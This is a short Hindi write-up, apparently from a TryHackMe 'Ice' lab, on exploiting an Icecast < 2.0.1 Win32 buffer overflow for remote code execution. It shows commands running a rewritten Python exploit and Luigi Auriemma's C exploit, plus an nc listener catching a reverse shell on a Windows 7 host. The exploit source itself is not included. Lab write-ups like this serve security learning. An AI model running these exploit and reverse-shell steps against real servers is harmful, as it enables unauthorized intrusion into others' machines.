
Icecast हेडर ओवरराइट बफर ओवरफ्लो RCE < 2.0.1 (Win32)
Python 3 Icecast हेडर ओवरराइट बफर ओवरफ्लो RCE < 2.0.1 (Win32), इस Metasploit मॉड्यूल से पुनर्लिखित। मैंने इसे Metasploit मॉड्यूल से फिर से लिखा क्योंकि मैं इसे काम नहीं करवा सका।
एक्सप्लॉइट में रिवर्स शेल शेलकोड बदलें, और इसे रिमोट सर्वर और पोर्ट के लिए तर्क के साथ कॉल करें।
root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000
Done!
रिवर्स शेल लिसनर:
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
मैं मूल एक्सप्लॉइट को काम करवाने में सफल रहा। इसके अनुसार संपादित किया गया।
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: [email protected]
web:http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 192.168.92.133:8000
- send malformed data
Server IS vulnerable!!!
लिसनर पर
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>